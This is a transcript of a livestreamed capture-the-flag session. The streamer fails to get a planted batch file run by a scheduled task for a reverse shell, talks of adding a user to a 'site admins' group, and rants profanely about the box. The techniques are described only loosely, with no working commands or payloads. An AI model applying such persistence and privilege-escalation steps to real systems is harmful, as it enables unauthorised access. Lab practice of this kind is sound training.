this? Is there some kind of, like... Is it only running batch scripts that are named a certain thing? Like, it says star.bat. I am so extraordinarily fucking bored. Yeah, we can create a bat file. We did. There is a bat file. It's not executing. Batch file, not executing. Is there anything that's incorrect about this command? 10, 14, 30. Did I listen on the wrong port or something? No. No. I'm so fucking bored. Like, I'm just so fucking bored. I don't know what to do, dude. I'm so fucking tired of this garbage. This is such a stupid way to have a box. There's nothing interesting anymore. Is there anything interesting about this box anymore? Is there anything interesting? No, we can't overwrite that batch file, because that batch file is executing every 5 minutes. We're supposed to write a different batch file. I don't know what the fuck it wants. Apparently, it doesn't want this. Fucking stupid. Maybe it doesn't want .exe for some reason. Who knows? We're just going to try a bunch of crap until it works. I'm so fucking sick of this box. I just want it, like... This was one of the dumbest this started out so strong and has become one of the dumbest, most frustrating boxes I've done so far. Like, this is... I've done more of these boxes than is actually healthy. Bandolero, welcome. I'm not naming it .ps1. A.bat. Cthulhu.ps1. It's reaching out to my machine looking for Cthulhu.ps1. It's named a bat file. I am so fucking bored. This is so boring. Why not to put a listener, buddy? What do you think this is? What do you think these are? What do you think these are? What do you think? That's a netstat tier comment. So fucking bored. I'm so fucking bored writing batch files. I'm so fucking bored. None of which execute for no reason. I literally have 2 fucking listeners listening. And by the way, we have to wait 5 minutes for it to execute. Every single time. I'm so unbelievably bored with this box. If this doesn't work, we're gonna be done. Like, I don't think we're coming back to this box. I'm incredibly bored. This thing has been a slog. This has been a fucking nightmare. The VPN went out. The 5-minute wait. Yeah, I know. We put, like, we have a scheduled task that's running every 5 minutes. That's what they thought was appropriate. Come on, man, don't give up. Dude, there's nothing interesting here. There's nothing to figure out. I know exactly what to do. Assuming I'm reading this correctly, these fucking eldritch runes that batch is written in. This is just running every batch file in the folder, except for the file itself. That's it. So anything named with a .bat after it should execute. And yet, mysteriously, ours does not execute. I mean, I guess we could. I think it's the actual host. I think it's the domain controller is the actual host, because that's the one that Hyper-V is running on. So that's the actual host. It should be able to reach us. It should be able to reach our IP address. And again, we have to wait for 5 fucking minutes before we know for a fact that it isn't gonna run. That's just heinous. Maybe more simple than get a shell back? What? What is more simple? We can only execute certain commands, my dude. Like, someone hasn't been reading the box. Get command. All we can do is write to these batch scripts, okay? And then these batch scripts execute, presumably, with fucking Lois's permissions. It says for Lois use only. So presumably we get Lois's permissions if we do this. All we know with that is that Lois is the only authorized account personnel to change group membership. Contact Lois to have this approved and changed in with required. Only Lois can become site admin. Like, is that a... I fucking hate this stupid fucking box. Is site admin a group? I have no idea. Site admin? Well, we can't run net group. We're back in Meterpreter again. Great. Alrighty. So we can't run net group because there's a hint at the bottom of the... I saw the hint, but is that a group? What does that group do? Is that just domain admins? Again, the real question is simply, why isn't this fucking executing? I'm so fucking bored. I'm so bored with this stupid box. I don't know. Maybe we can do, like... I guess I'll just try more shit. I don't know what to do. We're waiting for anything to happen because the sociopath who made this box decided that the fucking thing should call back every 5 fucking minutes. We'll just try a different batch script. I don't know what else to do. Net group site admin? Site admins? Maybe? I don't know what the name of the group is. There's no way for me to know. I guess we can try pinging. Why not? Tried everything else. Okay, we're pinging now. Not that it's going to do anything, because it's just not going to execute for some reason. Like, we can do net group site admins. I don't even know if that's the name of the group. A Wallace add? That was the name of the user, right? A Wallace. I mean, I guess. Oh, we got to do add domain as well. I don't know what the name of the group is. I haven't even been able to run Bloodhound. We've been in fucking PowerShell hell. It's just PowerShell hell the whole time. Like, waiting for eternity for these fucking... Okay, I don't know if the box is broken and this thing just isn't executing. I don't know what its deal is. I'm so fucking tired of using PowerShell to overwrite a file. This is so fucking stupid. This is really fucking stupid. I can't even use Bloodhound. I can't do net groups. Guys, I don't know the name of the group. There's no way I can know the name of the group. Nothing executes. Like, nothing executes. This fucking shit is not executing. Nothing is happening. I don't know what you want. Nothing is happening. This is a really stupid box. Nothing executes. Nothing is happening. I'm tired of waiting. We've been waiting for over a half an hour for anything to happen here. Okay, I'm done. That is all. All right, well, very stupid box. It started real strong. It started really, really strong. But I'm done. I am done. This is, like, it's... Literally every single moment of this box has been use PowerShell invoke command and write to some fucking file. I'm done. I'm not wasting any more time on this. There's nothing interesting to be learned. You guys are saying there's some kind of group I can add to. It says I need to be part of site admins, it says. Only Lois can become site admin. But I can't even run Bloodhound. I can't even run net groups. I don't even know what that group is. I don't know what it's fucking... I don't know what it fucking does. Nothing executes. Box doesn't work. Nothing is executing. Fellas. Nothing is executing. Look. No pings. No pings. No connection. No connection. Nothing. There's nothing. There's fucking nothing. There's literally fucking nothing, fellas. Fucking nothing. Box doesn't work. It's broken. Okay? It's not a tricky box. It's really not a tricky box. It's not complicated at all. It's very fucking stupid. Every vector in this box has been, oh, just fucking remote into the, use PowerShell remoting. Like, Use PowerShell remoting to overwrite a file. Like, over and over again. That's all it is. That's the whole box. I did not overwrite bbat. It's right there. See? Oh, I did overwrite it with the ping. Not that it fucking matters. It's not going to execute anyway. Who cares? It's not going to execute. Box doesn't fucking work, dude. There is AV. Thanks, buddy. Appreciate it. Definitely don't know. What's AV? Don't know what that is. Jesus fucking Christ. Why do people keep recommending these boxes? Everyone was clamoring for me to do this box. Literally everybody. Why do you people pick the worst fucking boxes? This is the worst one in months. This is worse than Sea Surfer. At least Sea Surfer was interesting. The only thing stupid about Sea Surfer was the Admariner thing. The Adminer thing. This box sucks ass. There's nothing about this box that's interesting. Nothing. Like, well, that's not true. The screenshot thing was cool. I like the screenshot thing. I think we were supposed... I'm not explaining it again. I'm not explaining why keepmeon.bat is not what you want to be overwriting. I'm not going to explain it. I'm not doing it. I'm not explaining it. Try reading the file. Try reading keepmeon.bat and then tell me I'm supposed to overwrite it. Super Axe Hacker, thanks for the 3 months, my dude. I'm really sleep deprived. I only got like 4 hours, 3 or 4 hours of sleep last night. This box has been a slog. It's very dumb. It doesn't work. I don't know what they want from me in order to get this shit to execute. You have to wait for 5 minutes just to see if your shit executes. Doesn't work. And people are just fucking telling me spoilers in chat. Which are, it's just very boring to me. I thought there was going to be Active Directory at some point. There hasn't been. I thought there was going to be literally anything of any interest at any point other than the screenshot thing. The screenshot thing was good. The rest of this box was incredibly dumb and dull and boring. It was just, it's like there's nothing interesting, or we didn't learn it. I don't feel like I learned anything. I feel like it's just very tedious and picky because it forces you to be in PowerShell.
Sorry, the box was
like it just forces you to be in PowerShell the whole time. So, thanks for being here, everybody. Sorry about the rage. A very dumb box. We're not going to be coming back to this one. We're going to do something fun on Sunday. I don't care about this box. This is dumb. There's nothing interesting to be learned here. I'd be fine to stick it out if I felt like there was something interesting to be learned. There's nothing interesting here. This is very dumb. It's very stupid. Oh, hey, a miracle occurred. Chat, a miracle occurred. We got pings. It actually did ping us. We still don't get a fucking shell. So, but it did ping us. I don't know why it's not executing PowerShell. But whatever. Go to bed. Who are we rating? I just can't do this box anymore. We're not coming back to it. I don't care. I don't care. I'm done with this box. Next time, please recommend a box that is not ass. Like, this box is ass. Like, this is just straight ass. If you're going to make a box, at least make it interesting. This box creator had one interesting idea, and then the rest of it was garbage.
A hunter must hunt.
Do we just have no one to raid? I'm just tired of the PowerShell. It's so freaking stupid. I appreciate it, Producer Wolf. Thank you. I'm just so tired of the PowerShell. It's just non-stop PowerShell. And it's the same shit over and over again, too. Like, it's just the same stuff again and again. Next time, we're going to do a box that I choose. Chat really screwed the pooch with this one. Everyone wanted this box. They're like, yeah, let's totally do Acute. It's fucking ass, dude. Fucking garbage. Trash tier box. I'd give it a 1 rating. No, I'll give it a 2 for the screenshot thing. The screenshot thing was cool. Who am I even rating? Nobody is streaming. Stop letting chat pick the box. Except, I mean, I try hard not to do these boxes ahead of time. And it's hard for me to, like, review the boxes to find good ones without, like, getting spoilers. Are people just looking at walkthroughs? Yeah, that guy Let's Go was doing that, I'm pretty sure. Just over and over again, just posting spoilers in the chat. And I had to keep timing him out. Jesus fucking Christ. We already had Alhaz Ross. I couldn't wear the wig anymore. It constricts my head. It's very painful to wear over a long period of time. I'm doing CRTV, so this box was interesting. There's no Active Directory here, dude. We didn't do any Active Directory. Where was the Active Directory? It's all fucking stupid-ass PowerShell shit. Literally the only thing. All it was, hey, PowerShell invoke command and write to a file. Oh, hey, you know how you need to get to the next thing? PowerShell invoke command and write to a file. Oh, hey, you know how you need to get to the next part of the box? PowerShell invoke command and write to a file. And for the 4th time, they really changed it up and had me use PowerShell invoke command to write to a file. Jesus fucking Christ. That's all it was. There was nothing to it. The mold is yeah, but only if the mold serves for learning. I don't feel like I learned anything. What was learned? I feel like I didn't learn anything, honestly. I feel like I didn't learn anything. It was all stuff I already knew. It's just incredibly tedious and dumb. It learns you how to use PowerShell? No, it doesn't. It learns you how to use invoke command. Oh, we did DC manage. I forgot about DC manage. We did learn that. PowerShell configurations. All right, we're going to wait a little Aggie. He's doing a crazy Pokemon run. He's a streamer I like to watch a lot. He's not doing science and tech stuff, but there's no hackers on right now, so that's what we're doing. Okay, video games. Video games. So bring him glad tidings of Dread Cthulhu. Sorry I didn't make it through the box. It's just that box is insufferable. It's a very dumb box. I don't want to do any more of it. I was hoping there'd be Active Directory at some point. There was none. It was incredibly unrealistic too. There was nothing realistic whatsoever about that box. You can't talk to you have a domain joined machine that can't talk to its domain controller. You have like a chain of users that all have access to files that other users own and are executing all the time. It was dumb. It's a stupid box. The screenshot part was the only part that was interesting. I thought that part was really cool. I did not think that the rest of it was interesting at all. It was poorly designed. So yeah, go to bed tonight. We'll keep it. We'll be much higher energy on Sunday. I just need to rest. Go to bed tonight knowing a little bit more than you did yesterday. I'll see you guys again when the stars are right. Chad B. Noob, thanks for those two new cult initiates. Jifram, thanks for the 1,000 tickle biddies. Mr. Yoshimitsu, thank you for the follow. See you guys on Sunday.